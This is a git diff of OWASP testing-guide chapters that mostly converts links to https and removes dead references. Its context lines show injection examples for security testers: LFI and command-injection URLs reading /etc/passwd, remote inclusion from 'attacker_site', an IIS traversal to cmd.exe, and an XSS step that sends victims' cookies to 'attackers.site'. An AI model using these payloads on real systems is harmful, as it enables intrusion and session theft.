and password. Let's assume that our database is represented by the following XML file: +The [XPath attack pattern was first published by Amit Klein](https://dl.packetstormsecurity.net/papers/bypass/Blind_XPath_Injection_20040518.pdf) and is very similar to the usual SQL Injection. In order to get a first grasp of the problem, let's imagine a login page that manages the authentication to an application in which the user must enter their username and password. Let's assume that our database is represented by the following XML file: ```xml @@ -64,5 +64,5 @@ If there is no knowledge about the XML data internal details and if the applicat ### Whitepapers -- [Amit Klein: "Blind XPath Injection"](http://dl.packetstormsecurity.net/papers/bypass/Blind_XPath_Injection_20040518.pdf) +- [Amit Klein: "Blind XPath Injection"](https://dl.packetstormsecurity.net/papers/bypass/Blind_XPath_Injection_20040518.pdf) - [XPath 1.0 specifications](https://www.w3.org/TR/1999/REC-xpath-19991116/) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md index d46bac9b01..539ee71801 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_IMAP_SMTP_Injection.md @@ -53,29 +53,29 @@ IMAP special parameters that should be used are: In this example, the "mailbox" parameter is being tested by manipulating all requests with the parameter in: -`http:///src/read_body.php?mailbox=INBOX&passed_id=46106&startMessage=1` +`https:///src/read_body.php?mailbox=INBOX&passed_id=46106&startMessage=1` The following examples can be used. - Assign a null value to the parameter: -`http:///src/read_body.php?mailbox=&passed_id=46106&startMessage=1` +`https:///src/read_body.php?mailbox=&passed_id=46106&startMessage=1` - Substitute the value with a random value: -`http:///src/read_body.php?mailbox=NOTEXIST&passed_id=46106&startMessage=1` +`https:///src/read_body.php?mailbox=NOTEXIST&passed_id=46106&startMessage=1` - Add other values to the parameter: -`http:///src/read_body.php?mailbox=INBOX PARAMETER2&passed_id=46106&startMessage=1` +`https:///src/read_body.php?mailbox=INBOX PARAMETER2&passed_id=46106&startMessage=1` - Add non-standard special characters (i.e.: `\`, `'`, `"`, `@`, `#`, `!`, `|`): -`http:///src/read_body.php?mailbox=INBOX"&passed_id=46106&startMessage=1` +`https:///src/read_body.php?mailbox=INBOX"&passed_id=46106&startMessage=1` - Eliminate the parameter: -`http:///src/read_body.php?passed_id=46106&startMessage=1` +`https:///src/read_body.php?passed_id=46106&startMessage=1` The final result of the above testing gives the tester three possible situations: S1 - The application returns a error code/message @@ -88,11 +88,11 @@ An attacker's aim is receiving the S1 response, as it is an indicator that the a Let's suppose that a user retrieves the email headers using the following HTTP request: -`http:///src/view_header.php?mailbox=INBOX&passed_id=46105&passed_ent_id=0` +`https:///src/view_header.php?mailbox=INBOX&passed_id=46105&passed_ent_id=0` An attacker might modify the value of the parameter INBOX by injecting the character `"` (%22 using URL encoding): -`http:///src/view_header.php?mailbox=INBOX%22&passed_id=46105&passed_ent_id=0` +`https:///src/view_header.php?mailbox=INBOX%22&passed_id=46105&passed_ent_id=0` In this case, the application answer may be: @@ -117,11 +117,11 @@ After identifying all vulnerable parameters (for example, `passed_id`), the test In this test case, we have detected that the application's `passed_id` parameter is vulnerable and is used in the following request: -`http:///src/read_body.php?mailbox=INBOX&passed_id=46225&startMessage=1` +`https:///src/read_body.php?mailbox=INBOX&passed_id=46225&startMessage=1` Using the following test case (providing an alphabetical value when a numerical value is required): -`http:///src/read_body.php?mailbox=INBOX&passed_id=test&startMessage=1` +`https:///src/read_body.php?mailbox=INBOX&passed_id=test&startMessage=1` will generate the following error message: @@ -160,7 +160,7 @@ It is important to remember that, in order to execute an IMAP/SMTP command, the Let's suppose that in the [Identifying vulnerable parameters](#identifying-vulnerable-parameters) stage, the attacker detects that the parameter `message_id` in the following request is vulnerable: -`http:///read_email.php?message_id=4791` +`https:///read_email.php?message_id=4791` Let's suppose also that the outcome of the analysis performed in the stage 2 ("Understanding the data flow and deployment structure of the client") has identified the command and arguments associated with this parameter as: @@ -168,7 +168,7 @@ Let's suppose also that the outcome of the analysis performed in the stage 2 ("U In this scenario, the IMAP injection structure would be: -`http:///read_email.php?message_id=4791 BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791` +`https:///read_email.php?message_id=4791 BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791` Which would generate the following commands: @@ -196,4 +196,3 @@ Footer = V101 FETCH 4791 - [RFC 0821 "Simple Mail Transfer Protocol"](https://tools.ietf.org/html/rfc821) - [RFC 3501 "Internet Message Access Protocol - Version 4rev1"](https://tools.ietf.org/html/rfc3501) -- [Vicente Aguilera Díaz: "MX Injection: Capturing and Exploiting Hidden Mail Servers"](http://www.webappsec.org/projects/articles/121106.pdf) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md index 6cd3381630..af36e81a16 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.md @@ -23,7 +23,7 @@ In [Code Injection](https://owasp.org/www-community/attacks/Code_Injection) test Using the querystring, the tester can inject code (in this example, a malicious URL) to be processed as part of the included file: -`http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a` +`https://www.example.com/uptime.php?pin=https://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a` > The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file. @@ -62,7 +62,6 @@ End If ### References -- [Security Focus](http://www.securityfocus.com) -- [Insecure.org](http://www.insecure.org) -- [Wikipedia](http://www.wikipedia.org) +- [Insecure.org](https://insecure.org/) +- [Wikipedia](https://www.wikipedia.org) - [Reviewing Code for OS Injection](https://wiki.owasp.org/index.php/OS_Injection) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md index 8f587f81e1..0a2b37387c 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_File_Inclusion.md @@ -30,13 +30,13 @@ Since LFI occurs when paths passed to `include` statements are not properly sani Consider the following example: -`http://vulnerable_host/preview.php?file=example.html` +`https://vulnerable_host/preview.php?file=example.html` This looks to be a promising place to try LFI. If the application does not select the appropriate page given in the `file` parameter and instead directly includes the input, it is possible to include arbitrary files from the server. A typical proof-of-concept exploit would be to attempt to load the `passwd` file with: -`http://vulnerable_host/preview.php?file=../../../../etc/passwd` +`https://vulnerable_host/preview.php?file=../../../../etc/passwd` If the above mentioned conditions are met, an attacker would see something like the following included in the response: @@ -59,7 +59,7 @@ Simple substitution with a random filename would not work as the postfix `.php` #### Null Byte Injection -The `null character` (also known as `null terminator` or `null byte`) is a control character with the value zero present in many character sets that is being used as a reserved character to mark the end of a string. Once used, any character after this special byte will be ignored. Commonly the way to inject this character would be with the URL encoded string `%00` by appending it to the requested path. In our previous sample, performing a request to `http://vulnerable_host/preview.php?file=../../../../etc/passwd%00` would ignore the `.php` extension being added to the input filename, returning to an attacker a list of basic users as a result of a successful exploitation. +The `null character` (also known as `null terminator` or `null byte`) is a control character with the value zero present in many character sets that is being used as a reserved character to mark the end of a string. Once used, any character after this special byte will be ignored. Commonly the way to inject this character would be with the URL encoded string `%00` by appending it to the requested path. In our previous sample, performing a request to `https://vulnerable_host/preview.php?file=../../../../etc/passwd%00` would ignore the `.php` extension being added to the input filename, returning to an attacker a list of basic users as a result of a successful exploitation. #### Path and Dot Truncation @@ -94,7 +94,7 @@ In order to test this vulnerability, the following procedure could be followed t 3. Rename the `target.zip` file to `target.jpg` to bypass the extension validation and upload it to the target website as your avatar image. 4. Supposing that the `target.jpg` file is stored locally on the server to the `../avatar/target.jpg` path, exploit the vulnerability with the PHP ZIP wrapper by injecting the following payload to the vulnerable URL: `zip://../avatar/target.jpg%23code` (remember that `%23` corresponds to `#`). -Since on our sample the `.php` extension is concatenated to our payload, the request to `http://vulnerable_host/preview.php?file=zip://../avatar/target.jpg%23code` will result in the execution of the `code.php` file existing in the malicious ZIP file. +Since on our sample the `.php` extension is concatenated to our payload, the request to `https://vulnerable_host/preview.php?file=zip://../avatar/target.jpg%23code` will result in the execution of the `code.php` file existing in the malicious ZIP file. ##### PHP Data @@ -117,7 +117,7 @@ include($incfile.".php"); In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against an allow list), so this snippet of code is vulnerable to this type of attack. Consider the following URL: -`http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page` +`https://vulnerable_host/vuln_page.php?file=https://attacker_site/malicous_page` In this case the remote file is going to be included and any code contained in it is going to be run by the server. @@ -139,6 +139,5 @@ Check out the [File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheat - [Unicode Encoding](https://owasp.org/www-community/attacks/Unicode_Encoding) - [Double Encoding](https://owasp.org/www-community/Double_Encoding) - [PHP Supported Protocols and Wrappers](https://www.php.net/manual/en/wrappers.php) -- [RFC 2397 - The "data" URL scheme](http://www.faqs.org/rfcs/rfc2397.html) -- ["Remote File Inclusion"](http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion) +- [RFC 2397 - The "data" URL scheme](https://www.rfc-editor.org/rfc/rfc2397) - [Wikipedia: "Remote File Inclusion"](https://en.wikipedia.org/wiki/Remote_File_Inclusion) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md index 260654ff24..e9c5f472b1 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection.md @@ -20,11 +20,11 @@ When viewing a file in a web application, the filename is often shown in the URL Example URL before alteration: -`http://sensitive/cgi-bin/userData.pl?doc=user1.txt` +`https://sensitive/cgi-bin/userData.pl?doc=user1.txt` Example URL modified: -`http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|` +`https://sensitive/cgi-bin/userData.pl?doc=/bin/ls|` This will execute the command `/bin/ls`. @@ -32,17 +32,17 @@ Appending a semicolon to the end of a URL for a .PHP page followed by an operati Example: -`http://sensitive/something.php?dir=%3Bcat%20/etc/passwd` +`https://sensitive/something.php?dir=%3Bcat%20/etc/passwd` ### Example -Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up a personal proxy (such as ZAP or Burp Suite), you can obtain a POST HTTP like the following (`http://www.example.com/public/doc`): +Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up a personal proxy (such as ZAP or Burp Suite), you can obtain a POST HTTP like the following (`https://www.example.com/public/doc`): ```txt POST /public/doc HTTP/1.1 Host: www.example.com [...] -Referer: http://127.0.0.1/WebGoat/attack?Screen=20 +Referer: https://127.0.0.1/WebGoat/attack?Screen=20 Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5 Authorization: Basic T2Vbc1Q9Z3V2Tc3e= Content-Type: application/x-www-form-urlencoded @@ -51,13 +51,13 @@ Content-length: 33 Doc=Doc1.pdf ``` -In this post request, we notice how the application retrieves the public documentation. Now we can test if it is possible to add an operating system command to inject in the POST HTTP. Try the following (`http://www.example.com/public/doc`): +In this post request, we notice how the application retrieves the public documentation. Now we can test if it is possible to add an operating system command to inject in the POST HTTP. Try the following (`https://www.example.com/public/doc`): ```txt POST /public/doc HTTP/1.1 Host: www.example.com [...] -Referer: http://127.0.0.1/WebGoat/attack?Screen=20 +Referer: https://127.0.0.1/WebGoat/attack?Screen=20 Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5 Authorization: Basic T2Vbc1Q9Z3V2Tc3e= Content-Type: application/x-www-form-urlencoded @@ -171,6 +171,5 @@ The web application and its components should be running under strict permission ## References - [Penetration Testing for Web Applications (Part Two)](https://www.symantec.com/connect/articles/penetration-testing-web-applications-part-two) -- [OS Commanding](http://projects.webappsec.org/w/page/13246950/OS%20Commanding) - [CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')](https://cwe.mitre.org/data/definitions/78.html) - [ENV33-C. Do not call system()](https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152177) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md index 7f8e3f0494..e982f3b0c9 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_Incubated_Vulnerability.md @@ -21,7 +21,7 @@ This type of asynchronous attack covers a great spectrum of attack vectors, amon - File upload components in a web application, allowing the attacker to upload corrupted media files (JPEG images exploiting `CVE-2004-0200`, PNG images exploiting `CVE-2004-0597`, executable files, site pages with active component, etc.) - Cross-site scripting issues in public forums posts (see [Testing for Stored Cross Site Scripting](02-Testing_for_Stored_Cross_Site_Scripting.md) for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board, or blog in order to inject some JavaScript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser. -- SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary JavaScript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [XSS-proxy](http://sourceforge.net/projects/xss-proxy)). +- SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary JavaScript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [XSS-proxy](https://sourceforge.net/projects/xss-proxy)). - Misconfigured servers allowing installation of Java packages or similar site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.) ## Test Objectives @@ -40,7 +40,7 @@ Verify the content type allowed to upload to the web application and the resulta #### XSS Example on a Bulletin Board -1. Introduce JavaScript code as the value for the vulnerable field, for instance `` +1. Introduce JavaScript code as the value for the vulnerable field, for instance `` 2. Direct users to browse the vulnerable page or wait for the users to browse it. Have a "listener" at `attackers.site` host listening for all incoming connections. 3. When users browse the vulnerable page, a request containing their cookie (`document.cookie` is included as part of the requested URL) will be sent to the `attackers.site` host, such as: `GET /cv.jpg?SignOn=COOKIEVALUE1;%20ASPSESSIONID=ROGUEIDVALUE; HTTP/1.1` 4. Use cookies obtained to impersonate users at the vulnerable site. @@ -59,7 +59,7 @@ FROM table_x WHERE field2 = 'x';    UPDATE footer    SET notice = 'Copyright 1999-2030%20 -       ' +       '    WHERE notice = 'Copyright 1999-2030'; ``` @@ -95,7 +95,3 @@ Most of the references from the Cross-site scripting section are valid. As expla - [CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests](https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186) - [Blackboard Academic Suite 6.2.23 +/-: Persistent cross-site scripting vulnerability](https://cxsecurity.com/issue/WLB-2006080004) - -### Whitepapers - -- [Web Application Security Consortium "Threat Classification, Cross-site scripting"](http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtml) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md index 9e59abd0a6..da1f4fb5da 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.md @@ -34,7 +34,7 @@ More specifically, if the parameter 'interface' has the value 'advanced', the ap ```http HTTP/1.1 302 Moved Temporarily Date: Sun, 03 Dec 2005 16:22:19 GMT -Location: http://victim.com/main.jsp?interface=advanced +Location: https://victim.com/main.jsp?interface=advanced ``` @@ -49,7 +49,7 @@ The resulting answer from the vulnerable application will therefore be the follo ```http HTTP/1.1 302 Moved Temporarily Date: Sun, 03 Dec 2005 16:22:19 GMT -Location: http://victim.com/main.jsp?interface=advanced +Location: https://victim.com/main.jsp?interface=advanced Content-Length: 0 HTTP/1.1 200 OK @@ -91,7 +91,7 @@ As mentioned in the introduction, HTTP Smuggling leverages the different ways th There are several products that enable a system administration to detect and block a hostile web request depending on some known malicious pattern that is embedded in the request. For example, consider the infamous, old [Unicode directory traversal attack against IIS server](https://www.securityfocus.com/bid/1806), in which an attacker could break out the www root by issuing a request like: -`http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+` +`https://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+` Of course, it is quite easy to spot and filter this attack by the presence of strings like ".." and "cmd.exe" in the URL. However, IIS 5.0 is quite picky about POST requests whose body is up to 48K bytes and truncates all content that is beyond this limit when the Content-Type header is different from application/x-www-form-urlencoded. The pen-tester can leverage this by creating a very large request, structured as follows: diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md index 4634b43736..946fba06b6 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_HTTP_Incoming_Requests.md @@ -21,7 +21,7 @@ Most of Web security testing tools (i.e. AppScan, BurpSuite, ZAP) act as HTTP Pr There is situation that we would like to monitor all HTTP incoming requests on web server but we can't change configuration on the browser or application client-side. In this scenario, we can setup a reverse proxy on web server end to monitor all incoming/outgoing requests on web server. -For windows platform, Fiddler is recommended. It provides not only monitor but can also edit/reply the HTTP requests. Refer to [this reference for how to configure Fiddler as reverse Proxy](http://docs.telerik.com/fiddler/Configure-Fiddler/Tasks/UseFiddlerAsReverseProxy) +For windows platform, Fiddler Classic is recommended. It provides not only monitor but can also edit/reply the HTTP requests. Refer to [this reference for how to configure Fiddler as reverse Proxy](https://docs.telerik.com/fiddler/configure-fiddler/tasks/usefiddlerasreverseproxy) For Linux platform, Charles Web Debugging Proxy may be used. @@ -58,7 +58,7 @@ Fiddler or Charles are recommended since these tools can capture HTTP traffic an ## Tools - [Fiddler](https://www.telerik.com/fiddler/) -- [TCPProxy](http://grinder.sourceforge.net/g3/tcpproxy.html) +- [TCPProxy](https://grinder.sourceforge.net/g3/tcpproxy.html) - [Charles Web Debugging Proxy](https://www.charlesproxy.com/) - [WireShark](https://www.wireshark.org/) - [PowerEdit-Pcap](https://sourceforge.net/projects/powereditpcap/) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md index 71ae8f4006..534ed0f375 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection.md @@ -34,7 +34,7 @@ In the simplest case, this may cause a 302 redirect to the supplied domain. ```http HTTP/1.1 302 Found [...] -Location: http://www.attacker.com/login.php +Location: https://www.attacker.com/login.php ``` @@ -55,7 +55,7 @@ Potentially producing client-side output such as: ```html [...] - + [...] ``` @@ -75,7 +75,7 @@ The following will be served from the web cache, when a victim visits the vulner ```html [...] - + [...] ``` diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md index b3995bb444..9ec09f72fd 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-side_Template_Injection.md @@ -45,7 +45,7 @@ def page(): This code snippet is vulnerable to XSS but it is also vulnerable to SSTI. Using the following as a payload in the `name` parameter: ```bash -$ curl -g 'http://www.target.com/page?name={{7*7}}' +$ curl -g 'https://www.target.com/page?name={{7*7}}' Hello 49! ``` diff --git a/document/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.md b/document/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.md index e2d3f98b86..f505337189 100644 --- a/document/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.md +++ b/document/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/03-Testing_for_Sensitive_Information_Sent_via_Unencrypted_Channels.md @@ -133,7 +133,7 @@ Use HTTPS for the whole web site and redirect any HTTP requests to HTTPS. ## Tools - [curl](https://curl.haxx.se/) -- [grep](http://man7.org/linux/man-pages/man1/egrep.1.html) +- [grep](https://man7.org/linux/man-pages/man1/egrep.1.html) - [Wireshark](https://www.wireshark.org/) - [TCPDUMP](https://www.tcpdump.org/) diff --git a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/00-Introduction_to_Business_Logic.md b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/00-Introduction_to_Business_Logic.md index ddc900a9cd..8eed7b7edd 100644 --- a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/00-Introduction_to_Business_Logic.md +++ b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/00-Introduction_to_Business_Logic.md @@ -69,7 +69,7 @@ To view and modify HTTP/HTTPS headers, post parameters, and observe the DOM of t - [The Common Misuse Scoring System (CMSS): Metrics for Software Feature Misuse Vulnerabilities - NISTIR 7864](https://csrc.nist.gov/publications/detail/nistir/7864/final) - [Finite State testing of Graphical User Interfaces, Fevzi Belli](https://pdfs.semanticscholar.org/b57c/6c8022abfd2cb17ec785d3622027b3edfaaf.pdf) -- [Principles and Methods of Testing Finite State Machines - A Survey, David Lee, Mihalis Yannakakis](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.380.3405&rep=rep1&type=pdf) +- [Principles and Methods of Testing Finite State Machines - A Survey, David Lee, Mihalis Yannakakis](https://ieeexplore.ieee.org/document/533956) - [Security Issues in Online Games, Jianxin Jeff Yan and Hyun-Jin Choi](https://www.researchgate.net/publication/220677013_Security_issues_in_online_games) - [Securing Virtual Worlds Against Real Attack, Dr. Igor Muttik, McAfee](https://www.info-point-security.com/open_downloads/2008/McAfee_wp_online_gaming_0808.pdf) - [Seven Business Logic Flaws That Put Your Website At Risk – Jeremiah Grossman Founder and CTO, WhiteHat Security](https://www.slideshare.net/jeremiahgrossman/seven-business-logic-flaws-that-put-your-website-at-risk-harvard-07062008) @@ -77,16 +77,14 @@ To view and modify HTTP/HTTPS headers, post parameters, and observe the DOM of t ### OWASP Related -- [How to Prevent Business Flaws Vulnerabilities in Web Applications, Marco Morana](http://www.slideshare.net/marco_morana/issa-louisville-2010morana) +- [How to Prevent Business Flaws Vulnerabilities in Web Applications, Marco Morana](https://www.slideshare.net/slideshow/issa-louisville-2010morana/5391600) ### Useful Sites -- [Abuse of Functionality](http://projects.webappsec.org/w/page/13246913/Abuse-of-Functionality) - [Business logic](https://en.wikipedia.org/wiki/Business_logic) -- [Business Logic Flaws and Yahoo Games](http://jeremiahgrossman.blogspot.com/2006/12/business-logic-flaws.html) +- [Business Logic Flaws and Yahoo Games](https://blog.jeremiahgrossman.com/2006/12/business-logic-flaws.html) - [CWE-840: Business Logic Errors](https://cwe.mitre.org/data/definitions/840.html) - [Defying Logic: Theory, Design, and Implementation of Complex Systems for Testing Application Logic](https://pdfs.semanticscholar.org/d14a/18f08f6488f903f2f691a1d159e95d8ee04f.pdf) -- [Software Testing Lifecycle](http://softwaretestingfundamentals.com/software-testing-life-cycle/) ### Books diff --git a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/02-Test_Ability_to_Forge_Requests.md b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/02-Test_Ability_to_Forge_Requests.md index 8a93501fbc..7d3453361e 100644 --- a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/02-Test_Ability_to_Forge_Requests.md +++ b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/02-Test_Ability_to_Forge_Requests.md @@ -12,7 +12,7 @@ Vulnerabilities related to the ability to forge requests are unique to each appl Applications should have logic checks in place to prevent the system from accepting forged requests that may allow attackers the opportunity to exploit the business logic, process, or flow of the application. Request forgery is nothing new; the attacker uses an intercepting proxy to send HTTP POST/GET requests to the application. Through request forgeries attackers may be able to circumvent the business logic or process by finding, predicting and manipulating parameters to make the application think a process or task has or has not taken place. -Also, forged requests may allow subversion of programmatic or business logic flow by invoking "hidden" features or functionality such as debugging initially used by developers and testers sometimes referred to as an ["Easter egg"](http://en.wikipedia.org/wiki/Easter_egg_(media)). "An Easter egg is an intentional inside joke, hidden message, or feature in a work such as a computer program, movie, book, or crossword. According to game designer Warren Robinett, the term was coined at Atari by personnel who were alerted to the presence of a secret message which had been hidden by Robinett in his already widely distributed game, Adventure. The name has been said to evoke the idea of a traditional Easter egg hunt." +Also, forged requests may allow subversion of programmatic or business logic flow by invoking "hidden" features or functionality such as debugging initially used by developers and testers sometimes referred to as an ["Easter egg"](https://en.wikipedia.org/wiki/Easter_egg_(media)). "An Easter egg is an intentional inside joke, hidden message, or feature in a work such as a computer program, movie, book, or crossword. According to game designer Warren Robinett, the term was coined at Atari by personnel who were alerted to the presence of a secret message which had been hidden by Robinett in his already widely distributed game, Adventure. The name has been said to evoke the idea of a traditional Easter egg hunt." ### Example 1 @@ -58,6 +58,5 @@ The application must be smart enough and designed with business logic that will ## References -- [Cross Site Request Forgery - Legitimizing Forged Requests](http://www.stan.gr/2012/11/cross-site-request-forgery-legitimazing.html) - [Easter egg](https://en.wikipedia.org/wiki/Easter_egg_(media)) - [Top 10 Software Easter Eggs](https://lifehacker.com/371083/top-10-software-easter-eggs) diff --git a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/03-Test_Integrity_Checks.md b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/03-Test_Integrity_Checks.md index adfa9a2a41..9b13a3378f 100644 --- a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/03-Test_Integrity_Checks.md +++ b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/03-Test_Integrity_Checks.md @@ -70,7 +70,7 @@ The application should follow strict access controls on how data and artifacts c ## References -- [Implementing Referential Integrity and Shared Business Logic in a RDB](http://www.agiledata.org/essays/referentialIntegrity.html) +- [Implementing Referential Integrity and Shared Business Logic in a RDB](https://agiledata.org/essays/referentialIntegrity.html) - [On Rules and Integrity Constraints in Database Systems](https://www.comp.nus.edu.sg/~lingtw/papers/IST92.teopk.pdf) - [Use referential integrity to enforce basic business rules in Oracle](https://www.techrepublic.com/article/use-referential-integrity-to-enforce-basic-business-rules-in-oracle/) - [Maximizing Business Logic Reuse with Reactive Logic](https://dzone.com/articles/maximizing-business-logic) diff --git a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/05-Test_Number_of_Times_a_Function_Can_Be_Used_Limits.md b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/05-Test_Number_of_Times_a_Function_Can_Be_Used_Limits.md index 68483d0d89..7ef219dfee 100644 --- a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/05-Test_Number_of_Times_a_Function_Can_Be_Used_Limits.md +++ b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/05-Test_Number_of_Times_a_Function_Can_Be_Used_Limits.md @@ -37,5 +37,4 @@ The application should set hard controls to prevent limit abuse. This can be ach ## References -- [InfoPath Forms Services business logic exceeded the maximum limit of operations Rule](http://mpwiki.viacode.com/default.aspx?g=posts&t=115678) - [Gold Trading Was Temporarily Halted On The CME This Morning](https://www.businessinsider.com/gold-halted-on-cme-for-stop-logic-event-2013-10) diff --git a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/10-Test-Payment-Functionality.md b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/10-Test-Payment-Functionality.md index d98eaa5b9e..086b8e88c2 100644 --- a/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/10-Test-Payment-Functionality.md +++ b/document/4-Web_Application_Security_Testing/10-Business_Logic_Testing/10-Test-Payment-Functionality.md @@ -217,7 +217,6 @@ Examples of these test details for various payment gateways are listed below: - [Adyen - Test Card Numbers](https://docs.adyen.com/development-resources/test-cards/test-card-numbers) - [Globalpay - Test Cards](https://developer.globalpay.com/resources/test-card-numbers) - [Stripe - Basic Test Card Numbers](https://stripe.com/docs/testing#cards) -- [Worldpay - Test Card Numbers](http://support.worldpay.com/support/kb/bg/testandgolive/tgl5103.html) ### Testing Logistics diff --git 